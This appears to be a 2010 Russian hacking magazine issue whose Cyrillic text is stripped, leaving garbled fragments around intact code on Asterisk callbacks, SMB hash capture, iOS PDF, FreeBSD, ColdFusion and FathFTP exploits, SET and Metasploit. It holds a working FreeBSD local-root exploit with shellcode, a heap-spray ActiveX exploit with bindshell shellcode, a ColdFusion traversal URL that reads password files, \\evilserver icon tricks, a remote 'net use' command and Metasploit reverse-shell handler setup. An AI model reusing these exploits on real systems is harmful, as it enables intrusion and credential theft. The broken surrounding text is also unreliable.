=> t,n,GotoIf($["${tnum}" < "3"]?s,1)
=> t,n,Hangup()
ivr inum tnum

. pbx-invalid, inum 1.
,
tnum. Welcome,
. : 1 2
PIN-:
[ivr-out]
exten => s,1,Set (inum=0)
exten => s,n,Set (tnum=0)
exten => s,n,Background(beep)
exten => s,n,WaitExten(10)
exten => 89XXXXXXXXX,1,Dial(SIP/bla1/${EXTEN}
exten => 89XXXXXXXXX ,n,Hangup
exten => 8495XXXXXXX,1,Dial(SIP/bla2/${EXTEN}
exten => 8495XXXXXXX ,n,Hangup
exten => 8[2-8]XXXXXXXXX,1,Dial(SIP/blabla3/${EXTEN}
exten => 8[2-8]XXXXXXXXX ,n,Hangup
exten => i,1,Playback(pbx-invalid)
exten => i,n,Set(inum=$[${inum} + 1])
exten => i,n,GotoIf($["${inum}" < "3"]?s,1)
exten => i,n,Hangup()
exten => t,1,Set(tnum=$[${tnum} + 1])
exten => t,n,GotoIf($["${tnum}" < "3"]?s,1)
X 10 /141/ 10
exten => t,n,Hangup()

[ivr-ch-pin]
exten => s,1,Background(beep)
exten => s,n,WaitExten(10)
exten => _XXXX,1,MYSQL(Connect connid localhost
asterisk asterisk asterisk)
exten => _XXXX,n,MYSQL(Query resultid ${connid}
update callback set `pin`=${EXTEN} where
phone=${CALLERID(number)})
exten => _XXXX,n,MYSQL(Disconnect ${connid})
exten => _XXXX,n,Hangup()
exten => i,1,Hangup()
exten => t,1,Hangup()
ivr-out . ,
. : ,
; ( VoIP-): blabla1, blabla2 blabla3.
,
VoIP-, .
ivr-ch-pin, PIN: , 10 PIN.
PIN , PIN- .
CALL- ASTERISK'
, .
, PIN-, , Asterisk .
, !
, callback- ,
. ?
call-, . :
Channel: SIP/blabla1/8901234567
MaxRetries: 2
RetryTime: 3
WaitTime: 20
Context: ivr-pass
Extension: s
Priority: 2
Archive: Yes
... :
Channel , ;
MaxRetries .
, ;
RetryTime ;
WaitTime ,
, ;
Context ,
;
Extension ivr-pass, ,
( s);
Priority s,
( 2)
Archive Yes, call-
/var/spool/asterisk/outgoing_done
.
/var/spool/asterisk/outgoing/,
8901234567 ( X 10 /141/ 10
call- , ).
20 , ,
. ,
s callback.
CALLBACK
, ,
AGI (AsteriskGatewayInterface), . Perl, PHP, C,
Bash. Bash
, :
#!/bin/bash
echo Channel: SIP/blabla1/$1 > /tmp/$2
echoMaxRetries: 2 >> /tmp/$2
echoRetryTime: 3 >> /tmp/$2
echoWaitTime: 20 >> /tmp/$2
echo Context: ivr-pass >> /tmp/$2
echo Extension: s >> /tmp/$2
echo Priority: 2 >> /tmp/$2
echo Archive: Yes >> /tmp/$2
mv /tmp/$2 /var/spool/asterisk/outgoing
callback.agi /var/lib/asterisk/
agi-bin. : ($1 ),
, call- ($2 ).
callback, callback,
0.
PIN-.
0, . ivr-pass
callback:
[ivr-pass]
exten => s,1, GoToIf($["${callback}"! =
"0"]?callback,s,1)
exten => s,n,Background(WelcomePass) ;
exten =>s,n,WaitExten(10)
exten => _XXXX,1, GoToIf($["${EXTEN}" =
"${pin}"]?ivr,s,1)
exten => _XXXX,n,Hangup
exten => t,1,Hangup
exten => i,1,Hangup
[callback]
exten => s,1,AGI(callback.agi,${callback},${UNIQUEID})
exten =>s,n,hangup
[callback] callback.
agi : UNIQUEID call-. .
callback-.
: ,
.
CallerID, VoIP-. , VoIP, ( )
CallerID. . sim-dialer

20-25 . :).
,
callback . :)z
037

GreenDog agrrrdog@gmail.com
Easy Hack
1
:

:
, ( )
.
, .
. -,
, . , ...
-. - ,
:). , ,
:
, ;
;
;
;
;
;
;
, ;
:).
,
, -
. , .
. , ( , , ).
, . ,
pdf, .
pdf - .
:
IP DNS
:
, . .
, Dynamic DNS. DNS - ,
DNS . , ,
, .
(, www.no-ip.com, freedns.
afraid.org www.dyndns.com) habrahabr.ru/blogs/webdev/101336.
038
- doc-: ,
.
. / :
http://support.microsoft.com/kb/825576/ ,
, . ,
.
,
, (smartpctools.com/metadata). : (tarasco.
org/security/reversing_ole/index.html) ,
. , (,
). ,
( ).
DNS (, ) habrahabr.ru/
blogs/linux/101380. , ,
. , IP,
(reverse_tcp_dns, reverse_https MSF). IP . ,
HTTP- :
GET /nic/update?hostname=_&myip=_ip HTTP/1.0
Host: dynupdate.no-ip.com
Authorization: Basic ____base64
User-Agent: blah-blah-blah v.0.1a
, , :).
X 10 /141/ 10
:
DNS-
:
][
DNS- ( ). nbtool Ron Bowes (skullsecurity.org/wiki/index.
php/Nbtool).
(skullsecurity.org/blog/?p=433) DNS- dnsxss (
nbtool).
, , DNS, dnsxss
DNS- .
? , XSS
DNS-lookup. ,
DNS- !
,
, -. ,
, ! -, XSS ,
( )
, , -, ,
, -,
, ,
...
:).
, . DNS-
, HTML, , , . , , / , FF
HTML, IE ( :).
. , - nbtool 0.05.
: TCP/
IP.
:
. - ,
. : , , :).
TCP/IP. IP TCP( ICMP, UDP)
RFC: , , . ,
,
.
? ? ? ,
, .
.
1999-2000
(- ... , - :)),

(nmap.org/book/osdetect.html). .
- , , .
, TCP/IP- , ,

. , ,
, ,
. ,
, - . ,
, ,
, , ,
.
- p0f.
lcamtuf.coredump.cx.
, BackTrack 4. .
, 2006 .
.
:
SYN ( ) SYN-ACK;
;
X 10 /141/ 10
EttercapNG
RST ( , );
ACK ( ).
.
NAT, , .
pcap-.
, ,
.
, , p0f
.
, , ,
IP. ,
.
, p0f (-i) eth0
(-S) (-o):
p0f -i eth0 S o os.txt
pcap- RST-:
p0f -R -s test_osdetect.pcap
039
RST- pcap-
(promiscuous
mode) -p , tcpdump,
.
, p0f , ,
, . , , , .
. p0f Ettercap (ettercap.
sourceforge.net). , , .
1200 , 200 p0f.
Ettercap ( GTK, curses-):
,
/ , - , . ,
, .
, .
:
SMB relay-.
, ,
.
SMB
p0f . ?
Windows,
.
040
1)Sniff Unified sniffing

2)Start Start sniffing
3)View - Profiles
, ,
- . ,
dca.ufrn.br/~joaomedeiros/gsoc/2009/proposal/node1.html 2009
TCP ISN ( , p0f).
Nmap.
, , whois, dns lookup ..

attackvector.org/invasion-ofprivacy. . IP- ,
. . :).
, -
.
!
, ,
. Ink (), url ( ) desktop.ini ( ).
.
(TotalCommander
),
, . ,
url-.
url:
[InternetShortcut]
URL=http://www.example.com
IconFile=\\evilserver\ipc$
IconFile , ;
X 10 /141/ 10
URL , .
, url-,
,
- .
lnk . .
.
, HE-.
desktop.ini. .
,
:
IconFile , , , desktop.ini;
LocalizedResourceName ;
InfoTip desktop.ini;
desktop.ini .
desktop.ini :
[.ShellClassInfo]
desktop.ini=@\\evilserver\ipc$,-1
InfoTip=@\\evilserver\ipc$,-1
LocalizedResourceName=@\\evilserver\ipc$,-1
IconFile=\\evilserver\ipc$
, desktop.ini ,
.
:
attrib +s _
,
, . .
, .
.
(tarasco.org/security/payload/index.html), ,
html doc (ppt, xls) .
, lnk-:
payload.exe -t l -d \\evilserver\ipc$
t l lnk-;
-d .
:
WINPCAP
1)"wpcap.dll" C:\WINDOWS\system32\
2)"Packet.dll" C:\WINDOWS\system32\
3)"pthreadVC.dll" C:\WINDOWS\system32\
4)"npf.sys" C:\WINDOWS\system32\drivers\
:
, ,
. , , WinPcap . ,
XP, raw- , , -
( libpcap) WinPcap.
. Metasploit , , Win ( ).
, meterpreter icmp-,
WinPcap .
, . ,
,
. :
X 10 /141/ 10
,
, , WinPcap. , -,
, -,
npf.sys ,
.
WinPCap ( ), ,
(500 ).
,
npf.sys ,
. z
041

, Digital Security a.sintsov@dsec.ru
01

PDF- IOS
TARGETS
Apple iPhone 3/3G/3GS
Apple iPod
Apple iPad
Apple iOS 3.X/4.0.X
CVE
CVE-2010-1797
BRIEF
, . ,
, , , iPhone.
,
. SSH-,
... , , ,
. Jailbreak.
. .
( ), AppStore, .
? , Jailbreak,
- @comex (iPhone Dev Team),
0day Apple. Defcon 18. ,
0day : PDF-, ,
iOS.
iPhone . , ,
, , , ,
Apple-.
/Filter[/FlateDecode]
/Length 10709>>
stream
x}
t -ldc0!
.... ....
endstream
endobj
15 0 obj
<< /Type /FontDescriptor /Ascent 750 /CapHeight 676 /
Descent -250 /Flags 32
/FontBBox [-203 -428 1700 1272] /FontName /CSDIZD+TimesRoman /ItalicAngle
0 /StemV 0 /MaxWidth 1721 /XHeight 461 /FontFile3 13 0 R
>>
endobj
,
Type1C-, , , . , 15 ,
13 (/FontFile3 13 0 R), Type1C-.
(CFF - Compact Font Format) . ,
? /Filter[/FlateDecode],
, PDFTK
( - : paehl.de/pdf/gui_pdftk.html). ,
CFF-, ( ,
CFF), , , ROP-.
,
root' (
IOSurface).
, Jailbreak-, (
iOS) . .
SOLUTION
EXPLOIT
-, , . -
PDF-:
13 0 obj
<</Subtype/Type1C
042
Jailbreak', , ,
. .
, , , .
, Jailbreak,
, PDF-
.
X 10 /141/ 10
iPhone. PDF
EXPLOIT
iPhone Jailbreak
02

FREEBSD
TARGETS
FreeBSD 7.x
FreeBSD 8.x
CVE
? sendfile() mbuf-
.
, .
,
mbuf-
, ,
( ). sendfile(), mbuf.
, ,
( ). ,
/bin/sh, , root.
( x64 x32,
x32):
CVE-2010-2693
BRIEF
FreeBSD Ming Fu. root
. Kingcope ,
. ,
.
(FreeBSD)
mbuf. , , ,
.
sendfile()
( ) . ,
. , ,
mbuf.
mbuf,
sendfile(). ...
X 10 /141/ 10
main (int argc, char *argv[])

{
int s, f, k2;
struct sockaddr_in addr;
int flags;
// /tmp/sh root sticky bit
// ,
// ,
char str32[]=
"\x31\xc0\x6a\x00\x68\x70\x2f\x73\x68\x68\x2f\x2f\x74\x6d\x89\xe3"
"\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f"
"\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d"
"\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";
char buf[10000];
043
Kingcope FreeBSD
size = sb.st_size;
chunk = 0;
iPhone. URL,
char *p;
struct stat sb;
int n;
fd_set wset;
int64_t size;
off_t sbytes;
off_t sent = 0;
int chunk;
int arch = 3;
// loopback
s = socket(AF_INET, SOCK_STREAM, 0);
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(7030);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");
n = connect(s, (struct sockaddr *)&addr, sizeof (addr));
if (n < 0)
warn ("fail to connect");
// /bin/sh
f = open("/bin/sh", O_RDONLY);
if (f<0)
warn("fail to open file");
//
flags = fcntl(f, F_GETFL);
flags |= O_NONBLOCK;
fcntl(f, F_SETFL, flags);
// sendfile()
while (size > 0)
{
FD_ZERO(&wset);
FD_SET(s, &wset);
n = select(f+1, NULL, &wset, NULL, NULL);
if (n < 0)
continue;
if (chunk > 0)
{
sbytes = 0;
if (arch == 1)
n = sendfile(f,s,2048*2,chunk,NULL,&sbytes,0);
if (arch == 2)
n = sendfile(f,s,1204*6,chunk,NULL,&sbytes,0);
if (n < 0)
continue;
chunk -= sbytes;
size -= sbytes;
sent += sbytes;
continue;
}
chunk = 2048;
n = fstat(f, &sb);
if (n<0)
warn("fstat failed");
044
memset(buf, '\0', sizeof buf);

if (arch == 1)
{
X 10 /141/ 10
ColdFusion
//nop
for (k2=0;k2<256;k2++)
{
buf[k2] = 0x90;
}
p = buf;
p = p + k2;
// nop
memcpy(p, str32, sizeof str32);
n = k2 + sizeof str32;
p = buf;
}
//
// sendfile
// mbuf
// ,
// - /bin/sh
write(s, p, n);
}
}
, /bin/sh tmp:
cp /bin/sh /tmp/sh
cp /bin/sh /tmp/sh2
(ALT+F2) netcat, ,
...
nc -l 7030
:
gcc cache.c -o cache
./cache i386
. , ,
- /bin/sh,
/tmp/sh /tmp/sh2. /
tmp/sh, root.
X 10 /141/ 10
ColdFusion
SOLUTION
, , , M_RDONLY.
======================================================
--- sys/kern/uipc_mbuf.c
(revision 209948)
+++ sys/kern/uipc_mbuf.c
(working copy)
@@ -302,6 +302,7 @@
n->m_ext.ref_cnt = m->m_ext.ref_cnt;
n->m_ext.ext_type = m->m_ext.ext_type;
n->m_flags |= M_EXT;
+
n->m_flags |= m->m_flags & M_RDONLY;
}
/*
04

COLDFUSION
TARGETS X
ColdFusion 9
ColdFusion 8
ColdFusion 7
CVE
CVE-2010-2861
BRIEF
ColdFusion Web. , , . ,
, . ColdFusion,

. (Richard Brain), Adobe.
, ,
.
EXPLOIT
, , , :
045
http://server/CFIDE/administrator/enter.cfm?locale=ru
.
ru , , , .
../.
, ColdFusion ,
.
en ( ).
en,
. , , ? , ,
, ,
C:/ColdFusionX/lib/password.properties.
, :
http://server/CFIDE/administrator/enter.cfm?locale=..
/../../../../../../../../../ColdFusion8/lib/password.
properties%00en
SHA1- . ,
, ,
(Niels Teusink):
1. (/CFIDE/
administrator/enter.cfm),
;
2. javascript:hex_hmac_
sha1(document.loginform.salt.value,document.loginform.
cfadminPassword.value), Enter. ;
3. ;
4. MITM-, Burp,
TamperData- FireFox;
5. Login;
6. Post-
cfadminPassword, .
;
7. !
;
, ,
ColdFusion, , , (
SYSTEM). , , .
SOLUTION
, ,
.
. , Adobe hotfix, : adobe.com/support/security/bulletins/apsb10-18.html
05

FATHFTP
- FTP
HTML, ActiveX-.
, , . ,
,
.
EXPLOIT
, , , SEH. ,
, - , , ,
. . , ,
, - .
- . ( , ). ,
, ,
- . ,
, .
, , , . , , ,
.
ASCI-, , ,
. 10
, Heap Spray ( ) SEH . Heap Spray,
, , 0x0C0C0C0C.
, Heap Spray ,
.
. ,
,
(, nop ,
). : nop
( 0x90). 28876
. FathFTP.
1540 . , , 0x0C.
FileExists(),
0x0C.
, ,
1540 .
, , ,
. SEH-
0x0C0C0C0C.
, .
,
SEH-. ,
0x0C0C0C0C.
,
(Heap Spray). .
0x90 ,
. :
TARGETS
FathFTP 1.8
CVE
N/A
<html>
//CLSID FathFTP
<object classid='clsid:62A989CE-D39A-11D5-86F0B9C370762176' id='target'></object>
<script>
BRIEF
FathFTP 79 , FTP- . -
046
46
// Skyland win32 bindshell 28876

TCP- cmd.exe
X 10 /141/ 10
var shell = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b

3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348
b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df
%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%
u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u
1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7
768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc5
89%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7da
b%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6
%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%
uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%u
ffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u1
06a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53
db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec
0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0
%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%
ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u
5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uf
fff%uc483%u615c%u89eb");
// heap-spray, 90 nop
var bigbk=unescape("%u9090%u9090");
var header=20;
var space=header+shell.length;
X 10 /141/ 10
while(bigbk.length < space) bigbk+=bigbk;

var fillbk=bigbk.substring(0,space);
var bk=bigbk.substring(0,bigbk.length-space);
while(bk.length+space<0x40000) bk= bk+bk+fillbk;
var mem=new Array();
//
for(i=0; i<800;i++) mem[i]=bk+shell;
var buff="";
// 0x0C
for(i=0; i<1540;i++) buff+=unescape("%0c%0c%0c%0c");
//
target.FileExists(buff);
</script>
</html>
SOLUTION
. - ,
, Kill bit. Kill bit , , , .
, HKEY_LOCAL_MACHINE\SOFTWARE\
Microsoft\Internet Explorer\ActiveX Compatibility\,
62A989CE-D39A-11D5-86F0-B9C370762176 Compatibility
Flags, REG_DWORD, 0x00000400. z
047

D1g1 dsecrg.com
,

()
SET
, , ,
,
, . . ,
,
. ,
. . ...
vulnerability...
INTRODUCTION
.
, .
.
, .
,
, ,
, . ,
, PSYCHO,
,
.
048
IT IS BEATIFUL S.E.T.
. Social Engineer
Toolkit (SET), David
Kennedy (ReL1K), GPLv2.
toolkit ,
BackTrack,
. () SET
:
svn co http://svn.thepentest.com/social_engineering_
toolkit /pentest/exploits/SET
X 10 /141/ 10
www.social-engineer.org
SET , Python
,
. ,
.
,
( :)). , Python, SET ,
: Metasploit, ettercap, sendmail, apache
. , , ,
. SET
, . toolkit
, :
/pentest/exploits/SET/config/set_config
set_config ,
SET ( ).
, open-source, , - (0-day ), .
SET,
.
, SET
:
SET
E-MAIL ATTACK VECTOR
WEB ATTACK VECTOR
CD/DVD/USB ATTACK VECTOR
Teensy USB HID ATTACK VECTOR
-mail , file format, :

Adobe Flash Player 'newfunction' Invalid Pointer Use
X 09 /140/ 10
SET Nokia N900
Adobe Collab.collectEmailInfo Buffer Overflow

Adobe Collab.getIcon Buffer Overflow
Adobe JBIG2Decode Memory Corruption Exploit
Adobe PDF Embedded EXE Social Engineering

-, , , :
LNK Code Execution (MS10-046)

Help Center XSS and Command Execution (MS10-042)
IE iepeers.dll Use After Free (MS10-018)
IE Tabular Data Control Exploit (MS10-018)
IE "Aurora" Memory Corruption (MS10-002)

049

.
, /pentest/exploits/SET/config/mailing_list.
txt. . ,
,
. ,
:
Gmail-
Sendmail open-relay
- open-relay
Java Required
metasploit,
SET metasploit.
SET ,

Metasploit.
, ,
...
E-MAIL ATTACK VECTOR
email- .
Spear-Phishing Attack Vectors.
,
- . , .
, SET :
Social Engineering CTF

,
DEFCON 18 Riviera Hotel & Casino Las Vegas, Nevada. Social-Engineer.Org Offensive
Security. , , , .
,
, . ,
CTF, , .
: - , , , , ,
, ,
, .
URL. ,
, Google, BP, McAfee, Symantec, Shell, Microsoft,
Oracle, Cisco, Apple Walmart. , , :).
Digital Defense,
Warning Regarding DEF CON 18 Social Engineering Contest,

.
050
, :
Gmail-, SET, Sendmail, SET BackTrack,
, open-relay .
, SMTP- open-relay, NSE- Nmap:
nmap --script smtp-open-relay.nse <host>
pen-relay ,
, reverse
lookups,
.
(Meterpreter Reverse_TCP, Reverse VNC, Reverse TCP
Shell) metasploit
PDF-,
SET, PDF-.
listener , .
WEB ATTACK VECTOR
, , .
, ( ), -
-.
, ,
, , .
metasploit-fakeUpdate
g0tmi1k ,
bash- metasploit-fakeUpdate, ,
patch ( Linux, OSX, Windows), .
DHCP -, DNSSpoof
ARPSPoof, -
,
. ,
. , .
meterpreter SBD (Secure BackDoor) VNC, , , ,
backdoor. sniffer dnsiff, , .
,
BackTrack.
X 10 /141/ 10
HTTP://WWW
links
Teensy USB HID

, SET
ettercap, , ARP-spoofing.

. ,
.
XSS, email-,
... ,
. ,
,
. URL,
www.bit.ly (
). ,
,

/pentest/exploits/SET/src/program_
junk/<name_file>.pdf.

, SET
, :
Gmail, Google, Facebook, Twitter

Java Required

-, ,
Java Required,
, Java, ,
.
Java Applet, .

- .
toolkit URL,
.
-.
,
, .
- ,
404, ,
...,
,
IE. ,
.
, , web-attack
The Java Applet . Java Applet Java
Certificate, , ,
X 10 /141/ 10
metasploit payload.
, ,
, ,
Java. Java Applet
Thomas Werth.
, ,
, The Metasploit Browser
Exploit Method. SET
, .
IE ( ,
), ,
, IE , .
Credential Harvester ,
,
,
.
.
: , -
..

, ,
ICQ, Skype, Jabber e-mail.
Tabnabbing-.
,
Please wait while the site loads..., ,
,
,
, . ,
, , ,
(
). Credential Harvester. ,
SET 0.6.1, SSL (
, ).
.
Man Left in the Middle Attack toolkit
HTTP REFERER
,
. ,
, XSS ,
, . ,
XSS
Credential Harvester profit.
secmaniac.com
David Kennedy (ReL1K),
Social-Engineering
Toolkit (SET)
offensive-security.
com/metasploitunleashed/SocialEngineering-Toolkit
Metasploit
Unleashed
SET
social-engineer.org
Exploiting
Human Vulnerabilities
g0tmi1k.blogspot.
com/2010/05/scriptvideo-metasploitfakeupdate-v011.html

g0tmi1k,
metasploitfakeUpdate
INFO
info

SET

v0.6.1
Open-relay

.
WARNING
warning
!

!
,

!
051
mfu
CD/DVD/USB ATTACK VECTOR
,
LNK- ,
. SET
.
Infectious Media Generator,
payload, Encoder,
( AV bypass) reverse-connect.
SET autorun
: program.exe ( payload) autorun.inf,
program.exe. CD/DVD/USB
.
TEENSY USB HID ATTACK VECTOR
IronGeek WinFang SET

, Teensy USB HID (human interface device). ,
, . Teensy
mini-USB
. Teensy USB AVR- 16 , - 32-128 , RAM- 2,5-8
$18-27, .
,
USB-, ,
..
,
, ,
.
,
. ,
, USB U3
. ,
pde- Teensy. SET,
052
,
mfu
teensy.pde,
Arduino IDE Teensy Loader USB .
, Powershell
HTTP GET MSF, WSCRIPT HTTP GET MSF Powershell based Reverse
Shell. ,
payload C Arduino IDE, USB HID out of the box! 007 (
, ) , own' .
CONCLUSION
, , .
, .
, .
, , ... z
X 10 /141/ 10

"sh2kerr"
HITB

Hack In The Box. , ,
, ... ,
, ,
.
!
, , , ,
, Hack In The box . ,
( ) , ,
, , - , ,
, ,
,
, . ,
,
(
Fsecure, T2 ), , - .
,
,
, , , . ,
(, -, ) ,
, .
054
, , ,
, , ,
. , ,
,
.
, ( ,
Qualys), Laurent Outdot ( TETHRI Security),
( , 2000-
, XProbe), Saomuil Shah ( NetSquare) ,
, DSecRG. , ,
.
, ,
PCI DSS -.
.
, , ,
: Compliance First Security First.
, ,
X-Probe , , ,
, ,
, , . , ,
X 10 /141/ 10
, Afterparty HITB
, , , .
, ,
ERP SAP, ,
SAP ,
sapsploit. BBC Radio1 ERP,
.
XprobeNG. , , , . XProbe
,
,
Nmap ( ,
). , :
1. , ,
, , ,
, , ,
,
;
2.
;
3. IPv6;
4. ,
.
, ,
, .
, http://xprobe.sourceforge.net.
, ,
, JitSpray, , , Flash,
JIT-. ,
( :) JIT-
Apple Safari.
. ,
X 09 /140/ 10
,

.
, ,
How to rate the security of closed source software,
, Michael Thumann ERNW.
Troopers,
. : ,

. , , . :
?
, , - ,
, . ? ,
Thumanns
Trustworthiness Index. ,
. :
DEP ();
ASLR ();
055
SafeSEH ();
();
, /GS
( );
, ( );
(
);
( );
( );
( );
( );
.
, ,

.
, ,
.
Firefox.

DEP ASLR, . , ,
,
, , ,
. , , , , , ,
.
, ,
kane-box,
, John Kanen Flowers.
, ,
IDS/IPS, . , , OpenSource,
, . -,
open source hardware
. ,
,
, , . kane-box,
, Cisco PIX ( ).
$250 ( WiFi $300),
.
.
, ,
056
Microsoft

))
:
, , ,

PCI DSS, . , elite
,
,
/ $1250. , , .
.
,
. , , ,
, ,
.
, .
, , ,
.
, 16 . , , ,

X 10 /141/ 10
Appprint,
web2.0
, , . , ,
, ? :) , ,
. .
WEB IN THE MIDDLE

wsscan
nCircle
Ncircle Suite 360.
. , ,
kane-box.com.
Niels Teusink ( , )
Hacking Wireless Presenters. -,
, , ,
,
. , , , ,
. , :
[Win+R]
cmd /c net use x: http://10.1.1.1/x&x:x
[Enter]
, Web in The Middle, Laurent

Oudot Tehtri Security.
, ,
HTTP-.
: , . , ,
. ,
- -,
SSL. ,
, . Mozilla

, , , ,
Tamperdata:
http://live.mozillamessaging.com/%APP%/
whatsnew?locale=%LOCALE%&version=%VERSION
%&os=%OS%&buildid=%APPBUILDID%
Thunderbird :
http://live.mozillamessaging.com/thunderbird/start?
locale=en&version=3.0.4&os=Darwin&buildi
d=20100317134139
Apple iWork iLife:

,
.
. ,
X 10 /141/ 10
apple.com/welcomescreen/ilife09/iphoto/
apple.com/welcomescreen/iwork09/numbers/
apple.com/welcomescreen/iwork09/keynote/
057

RAZ0R HTTP://RAZ0R.NAME
Jit spray !, , ?
apple.com/welcomescreen/iwork09/pages/
"GET /welcomescreen/iwork09/pages HTTP/1.1
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3;
en-us)
AppleWebKit/533.16 (KHTML, like Geck
,
. ,
ISR-evilgrade (infobyte.com.ar/down/isr-evilgrade-Readme.txt),
Infobyte Security Research. :
Java plugin;
Winzip;
Winamp;
MacOS;
OpenOffices;
iTunes;
Linkedin Toolbar;
DAP [Download Accelerator];
Notepad++;
speedbit.
API .
, - ,
, ,
. ,
, , , , .

Firefox eff.org/https-everywhere. 0-day , , Iphone, HTC, Blackberry , , IPad.
Safari Ipad Ipad. ,
0-day .
WEB 2.0
, ,
. - ,
, ,
Shreeraj Shah, BlueInfy,
058
s tticheck
firefox
Web 2.0. , , ,
, . ,
Web 2.0 2010 :
1.Dom based XSS Ajax;
2.SQL injection SOAP & XML;
3.Blind SQL over JSON;
4.Auth Bypass-XPATH and LDAP;
5.Business Logic Bypass;
6.Decompilation Attack and Info Leakage;
7.WSDL scanning and API exposure Cloud;
8.XSS with Flash;
9.CSRF with XML;
10.Widgets/Mashup Exploitation.
.
1. DOM.
, Web 2.0 Ajax- ,
JavaScript-:
document.write()
document.writeln()
document.body.innerHtml=
document.forms[0].action=
document.attachEvent()
document.create()
document.execCommand()
document.body.
window.attachEvent()
document.location=
document.location.hostname=
document.location.replace()
document.location.assign()
X 10 /141/ 10
document.URL=
window.navigate()
-, , , DOMScan,
Dom-based XSS
- , , .
, blueinfy.
com/DOMScan.zip .
2. X-Path.
SQL- ,
, SQL, Xpath
. , , , -
, , ,
, SQL-. , :
string credential =
"//users[@username='"+user+"' and
@password='"+pass+"']";
' or 1=1 or ''=,

, ,
.
3. XSS Flash. SWF-,
, SWF decompiller.
? , , ,
. ,
:
on (release) {
getURL (_root.clickTAG, "_blank");
}
clickTAG,
. ,
http://url/to/flash-file.swf?clickTAG=javascript:
alert('xss')
:
on (release) {
if (_root.clickTAG.substring(0,5)== "http:" || _root.
clickTAG.substring(0,6)== "https:" || _root.clickTAG.
substring(0,1)== "/") {
getURL (_root.clickTAG, "_blank");
}
}

:
OWASP Flash Security Project
Blinded by flash (slides as pdf) by Prajakta Jagdalen Blackhat DC
2009
Neat, New, and Ridiculous Flash Hacks by Mike Bailey Blackhat
DC 2010
A Lazy Pen Tester's Guide to Testing Flash Applications
4. WSDL Scanning. WSDL. Web Service Discovery Language
-, XML.
XML- , XML-,
, , , . ,
. -
X 10 /141/ 10
, :
Inurl:wsdl
Inurl:asmx
wsScanner,
XML-,
, , , , , -.
, ; , .
5. CSRF with XML. CSRF,
(, CSFU Cross
site file upload ). , , GET/
POST-, ,
, . ,
, XML-, SRF, XML- . : pentestmonkey.net/
blog/csrf-xml-post-request.

Web 2.0 :
DOMScan (Beta) DOM-
XSS-,
.
DOMTracer (Beta) Firefox,
DOM Web 2.0 .
Binging(Beta)
( ). API Bing.
Web2Fuzz (Beta) , JSON XML-.
Web2Proxy (Beta) , , Web 2.0
.
AppPrint (Beta) ,
, . , ,
Vkontakte.ru, : - nginx/0.7.59 Microsoft-IIS/7.0, Web
2.0 script.aculous.
AppCodeScan 1.2
.
,

Web 2.0, ,
, HITB, Blackhat .
HitbJob,
,
, , ,
- . ,
Google, .
, ,
Capture the flag,
.
,
-,
.
, , ,
. ,
! z
059

GreenDog agrrrdog@gmail.com
METASPLOIT
FRAMEWORK
MSF
7 , MSF

, ,

. MSF .
MSF !
.
MSF, , ,
- , .
:).
, . , , / Metasploit .
, . , ,
- .
! MSF 3.4.2.
, MSF,
GTK. , ,
060
3.3 . , msfweb. , , ... !

. , . ,
Java, , MSF XMLRPC ,
.
: msfrpcd,
msfgui. msfgui start
new msfprcd
Win:
1. Cygwin
2. cd /msf3
X 10 /141/ 10
browser_autopwn : /
, ,
PostgreSQL + MSF. db_create
3. msfrpcd -S -U username -P password
S SSL, /
4. msfgui.jar, %MSF%\
msf3\data\gui , (
cygwine):
java jar msfgui.jar
db_autopwn x ( ).
nmap
:
msf> db_nmap PN sV 192.168.0.101
msfgui /, , IP .
-, , . , . ,
, ,
..
, MSF
, .
.
,
PostgreSQL. SQLite - /
, MySQL - . , Postgres . MSF. Win: , postgres
. pgAdmin: ,
(msf_user),
(msf_db). SQL-, , MSF.
msfconsole:
msf> db_driver postgresql
msf> db_connect msf_user:pass@127.0.0.1:5432/msf_db
db_create , , , (
postgres), .
Postgres.
, workspace.
, , /
. , db_workspace .
:
db_service /,
, nmap,
. db_autopwn
p ( );
db_notes , , Nmap, WMap. , db_autopwn, ,
db_notes .
db_vulns , MSF(WMap),
Nessus(OpenVAS), Nexpose.
X 09 /140/ 10
- MSF ,
. ( aux- version
scanner, , scanner/imap/imap_verison).
msf>
msf>
msf>
msf>
use
set
set
run
scanner/portscan/tcp
RHOSTS 192.168.0.101
PORTS 1-1000
-j
,
MSF, resource.
MSF. ,
meterpreter.
(metrevhandl.rc) :
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 192.168.0.102
exploit j
back
resource:
msf> resource metrevhandl.rc
. . ,
, , , MSF.
, home/.msf3/msfconsole.rc , msfconsole.
, .
...
WMAP. WMAP MSF -

- . WMAP ,
. -
061
PostgreSQL + MSF. db_edit

, , ,
, Rapid7
w3af , ,
MSF w3af.
( ):
1. wmap:
msf> load db_wmap
2. :
msf> wmap_targets -a http://www.example.com/
3. :
